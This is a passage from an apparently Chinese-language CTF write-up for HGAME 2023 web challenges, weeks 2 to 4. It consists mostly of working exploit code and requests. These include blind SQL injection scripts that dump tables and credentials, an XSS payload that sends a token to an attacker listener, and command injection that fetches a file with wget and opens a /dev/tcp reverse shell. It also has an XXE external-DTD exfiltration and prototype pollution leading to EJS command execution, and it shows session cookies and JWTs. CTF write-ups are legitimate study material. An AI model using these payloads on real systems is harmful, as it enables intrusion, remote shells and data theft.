    'Cookie': '_ga=GA1.1.41308100.1673534855; dark_mode=0; _ga_P1E9Z5LRRK=GS1.1.1673534854.1.1.1673536392.0.0.0; SESSION=MTY3MzY4NjE2MXxEdi1CQkFFQ180SUFBUkFCRUFBQUpQLUNBQUVHYzNSeWFXNW5EQVlBQkhWelpYSUdjM1J5YVc1bkRBZ0FCblZ6WlhJd01RPT18p83DrKePiU6Cm-ll27huH1r-VNy8S_bQHxrgpjDZg9U=',
    'Host': 'week-2.hgame.lwsec.cn:32118',
    'Origin': 'http://week-2.hgame.lwsec.cn:32118',
    'Referer': 'http://week-2.hgame.lwsec.cn:32118/home',
    'Upgrade-Insecure-Requests': '1',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36'
}

res = ''
for i in range(1,100):
	old_res = res
	for j in range(32,128):
		# 数据库 se4rch
		# payload = f'ascii(mid((SELECT(Database())),{i},1))^{j}'

		# 表名 5ecret15here,L1st,user1nf0
		# 也可以用DATABASE()代替数据库名
		# payload = f'ascii(mid((SELECT(GROUP_CONCAT(TABLE_NAME))FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA)LIKE("se4rch")),{i},1))^{j}'
		
		# 列名 f14gggg1shere
		# payload = f'ascii(mid((SELECT(GROUP_CONCAT(COLUMN_NAME))FROM(INFORMATION_SCHEMA.COLUMNS)WHERE(TABLE_NAME)LIKE("5ecret15here")),{i},1))^{j}'
		
		# flag hgame{4_M4n_WH0_Kn0ws_We4k-P4ssW0rd_And_SQL!}
		payload = f'ascii(mid((SELECT(GROUP_CONCAT(f14gggg1shere))FROM(5ecret15here)),{i},1))^{j}'
		data = {'search_id':payload}
		response = requests.post(url=url, headers=headers, data=data)
		# print(response.text)
		# result = re.findall(r'<div id="result">(.*?)</div>', response.text, re.S)[0]
		if('hard disk' in response.text):
			res += chr(j^1)
			break
	if res == old_res:
		break
	print(res)

Designer

直接admin登录，share页面有提示admin will see it later

审计源码后发现register路由有flag，但是要内部访问

app.post("/user/register", (req, res) => {
  const username = req.body.username
  let flag = "hgame{fake_flag_here}"
  if (username == "admin" && req.ip == "127.0.0.1" || req.ip == "::ffff:127.0.0.1") {
    flag = "hgame{true_flag_here}"
  }
  const token = jwt.sign({ username, flag }, secret)
  res.json({ token })
})

该路由存在xss漏洞，禁用了一些字符，但可以用eval和atob绕过

app.get("/button/preview", (req, res) => {
  const blacklist = [
    /on/i, /localStorage/i, /alert/, /fetch/, /XMLHttpRequest/, /window/, /location/, /document/
  ]
  for (const key in req.query) {
    for (const item of blacklist) {
      if (item.test(key.trim()) || item.test(req.query[key].trim())) {
        req.query[key] = ""
      }
    }
  }
  res.render("preview", { data: req.query })
})

利用share路由来插入payload和访问

app.post("/button/share", auth, async (req, res) => {
  const browser = await puppeteer.launch({
    headless: true,
    executablePath: "/usr/bin/chromium",
    args: ['--no-sandbox']
  });
  const page = await browser.newPage()
  const query = querystring.encode(req.body)
  await page.goto('http://127.0.0.1:9090/button/preview?' + query)
  await page.evaluate(() => {
    return localStorage.setItem("token", "jwt_token_here")
  })
  await page.click("#button")

  res.json({ msg: "admin will see it later" })
})

编写payload

var xhr = new XMLHttpRequest();
xhr.open("POST","http://127.0.0.1:9090/user/register",true);
xhr.setRequestHeader('content-type', 'applicationjson');
xhr.onreadystatechange = function() {
	if (xhr.readyState == 4) {
		var xhr1 = new XMLHttpRequest();
		xhr1.open("GET","http://XXX.XXX.XX.XX:XXXX/"+xhr.responseText);
    	xhr1.send(null);
	}
}
var data = {"username":"admin"};
xhr.send(JSON.stringify(data));

本地开启监听，在share直接打

POST /button/share HTTP/1.1
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZmxhZyI6ImhnYW1le2Zha2VfZmxhZ19oZXJlfSIsImlhdCI6MTY3Mzg4MDk1OX0.1TQg2QY5w4KiQ41LplIvQ6HCxXeSehgWosd5gFoi7Ho
Connection: keep-alive
Content-Length: 714
Content-Type: application/json
Cookie: _ga=GA1.1.41308100.1673534855; dark_mode=0; _ga_P1E9Z5LRRK=GS1.1.1673534854.1.1.1673536392.0.0.0; SESSION=MTY3MzY4NjE2MXxEdi1CQkFFQ180SUFBUkFCRUFBQUpQLUNBQUVHYzNSeWFXNW5EQVlBQkhWelpYSUdjM1J5YVc1bkRBZ0FCblZ6WlhJd01RPT18p83DrKePiU6Cm-ll27huH1r-VNy8S_bQHxrgpjDZg9U=
Host: week-2.hgame.lwsec.cn:30104
Origin: http://week-2.hgame.lwsec.cn:30104
Referer: http://week-2.hgame.lwsec.cn:30104/button/edit
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36


{"border-radius":"100px","background-color":"#000000","color":"#ffffff","border-width":"1px","box-shadow":"3px 3px #000","test":"\"><script>eval(atob('此处写入base64加密后的payload即可'))</script><\""}

然后查看监听得到token

{"token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmbGFnIjoiaGdhbWV7Yl9jNHJlX2FiMHV0X3Byb3AzcnQxdHlfaW5qRWN0aU9ufSIsImlhdCI6MTY3Mzg4MTMyNn0.9cL849te3rbTdSDeEhR4Hy3TYk7VuL2nsJlu8aidjP4"}

去https://jwt.io/解密即可

{
  "flag": "hgame{b_c4re_ab0ut_prop3rt1ty_injEctiOn}",
  "iat": 1673881326
}

Week3

Login To Get My Gift

登录界面存在sql注入，测试后发现禁用一些字符

= 空格 union like and

使用regexp盲注

#encoding: utf-8
import os
import requests
import re
import string
import threading
import urllib

letters = string.ascii_letters + string.digits + '-_}{,'

url = "http://week-3.hgame.lwsec.cn:31678/login"

flag = ''
for i in range(1,100):
    for j in letters:
        data = {
            # 数据库 l0g1nme 
            # "username":f"a'or(select/**/database()/**/regexp(\"^{flag+j}\"))#",

            # 表名 User1nf0mAt1on
            # "username":f"a'or(select(select/**/group_concat(table_name)from/**/information_schema.tables)regexp(\"^{flag+j}\"))#",
            
            # 列名 id,usern4me,passw0rd
            # "username":f"a'or(select(select/**/group_concat(column_name)from/**/information_schema.columns/**/where/**/table_name/**/regexp/**/\"User1nf0mAt1on\")regexp(\"^{flag+j}\"))#",
            
            # 用户名 hgAmE2023HAppYnEwyEAr,testuser
            # "username":f"a'or(select(select/**/group_concat(usern4me)from/**/User1nf0mAt1on)regexp/**/binary/**/\"^{flag+j}\")#",
            
            # 密码 WeLc0meT0hgAmE2023hAPPySql,testpassword
            "username":f"a'or(select(select/**/group_concat(passw0rd)from/**/User1nf0mAt1on)regexp/**/binary/**/\"^{flag+j}\")#",
            "password": "0"
        }
        response = requests.post(url=url, data=data)
        if 'Success' in response.text:
            flag += j
            print(flag)
            break

注意最后结果要区分大小写，使用该账户登录

password=WeLc0meT0hgAmE2023hAPPySql&username=hgAmE2023HAppYnEwyEAr

登陆后访问\home

hgame{It_1s_1n7EresT1nG_T0_ExPL0Re_Var10us_Ways_To_Sql1njEct1on}

Ping To The Host

部署一个恶意文件

sh -i >& /dev/tcp/xxx.xxx.xx.xx/xxxxxx 0>&1

先下载恶意文件

ip=127.0.0.1|wge\t%09http://xxx.xxx.xx.xx/exp

然后反弹shell即可

ip=127.0.0.1|bas\h%09exp

在根目录下得到flag

顺路看下源码

from flask import Flask, render_template, request
import os
import re

app = Flask(__name__)


@app.route("/", methods=["GET"])
def index():
    return render_template("index.html")


@app.route("/post", methods=["POST"])
def post():
    if request.method == "POST":
        ip = request.form.get("ip")
        print(ip)
        if not ip:
            mes = "Your ip cannot be empty"
            return render_template("index.html", message=mes)
        invalid = waf(ip)
        if invalid:
            mes = "Waf!"
            return render_template("index.html", message=mes)
        res = os.system("ping -c 5 -w 15 " + ip)
        print(res)
        if res == 0:
            mes = "Success"
            return render_template("index.html", message=mes)
        else:
            mes = "Failed"
            return render_template("index.html", message=mes)


def waf(ip):
    blacklist = [";", "cat", ">", "<", "cd", " ", "tac", "sh", "\+", "echo", "flag"]
    for black in blacklist:
        match = re.search(black, ip, re.M | re.I)
        print(match)
        if match:
            return True
    return False


if __name__ == "__main__":
    app.run("0.0.0.0", port=80)

Gopher Shop

整数溢出，可以使用2<<45

GET /api/v1/user/buyProduct?product=Flag&number=70368744177664 HTTP/1.1
Host: week-3.hgame.lwsec.cn:32018
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Referer: http://week-3.hgame.lwsec.cn:32018/shop
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _ga=GA1.1.41308100.1673534855; _ga_P1E9Z5LRRK=GS1.1.1673534854.1.1.1673536392.0.0.0; SESSION=MTY3NDY2NTg3MnxEdi1CQkFFQ180SUFBUkFCRUFBQUlfLUNBQUVHYzNSeWFXNW5EQVlBQkhWelpYSUdjM1J5YVc1bkRBY0FCV0ZrYldsdXxekOjqNPPWh-9h9e_otzhkRGXPnOpeotEWZA1kkvwT2w==; session=MTY3NDY2OTc2N3xEdi1CQkFFQ180SUFBUkFCRUFBQUpfLUNBQUVHYzNSeWFXNW5EQW9BQ0hWelpYSnVZVzFsQm5OMGNtbHVad3dIQUFWaFpHMXBiZz09fGWqb-tXfvhtArGTKVpLiHKHSHtXFhQWeBmT8yg6aooa
Connection: close

购买成功后直接Check Flag即可

hgame{GopherShop_M@gic_1nt_0verflow}

Week4

Tell Me

访问www.zip获取源码，看下send.php

<?php 
    
libxml_disable_entity_loader(false);

if ($_SERVER["REQUEST_METHOD"] == "POST"){
    $xmldata = file_get_contents("php://input");
    if (isset($xmldata)){
        $dom = new DOMDocument();
        try {
            $dom->loadXML($xmldata, LIBXML_NOENT | LIBXML_DTDLOAD);
        }catch(Exception $e){
            $result = "loading xml data error";
            echo $result;
            return;
        }
        $data = simplexml_import_dom($dom);

        if (!isset($data->name) || !isset($data->email) || !isset($data->content)){
            $result = "name,email,content cannot be empty";
            echo $result;
            return;
        }

        if ($data->name && $data->email && $data->content){
            $result = "Success! I will see it later";
            echo $result;
            return;
        }else {
            $result = "Parse xml data error";
            echo $result;
            return;
        }
    }
}else {
    die("Request Method Not Allowed");
}

?>

首行libxml_disable_entity_loader(false);可以看出有xxe漏洞，先部署下自己的exp.dtd(记得对%编码一下)

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=flag.php">
<!ENTITY % print "<!ENTITY &#37; send SYSTEM 'http://xxx.xxx.xx.xx:xxxxxxx/?c=%file;'>">

然后打

<!DOCTYPE xxe [
<!ENTITY % dtd SYSTEM "http://xxx.xxx.xx.xx/exp.dtd">
%dtd;%print;%send;]>

发现flag

解码一下即可

<?php 
    $flag1 = "hgame{Be_Aware_0f_XXeBl1nd1njecti0n}";
?>

Shared Diary

传json给login获取session

{
    "username":"admin",
    "password":"1",
	"constructor":{
        "prototype":{
			"constructor":{
                "prototype":{
					"constructor":{
                        "prototype":{
                            "client":true,"escapeFunction":"1; return global.process.mainModule.constructor._load('child_process').execSync('cat /flag');",
                            "compileDebug":true,
							"role":"admin"
							}
						}
					}
				}
			}
		}
}

然后用得到的session去POST请求\即可

session=s%3AHHwyaFtboARnsQI0PO6-9LJ9nrxBLQ-S.%2FdYHGGiw8Q3FhBzWW0ZZ7Y%2FhVCq%2BuMbczIqvEePmWtY;

最后得到flag

hgame{N0tice_prototype_pollution&&EJS_server_template_injection}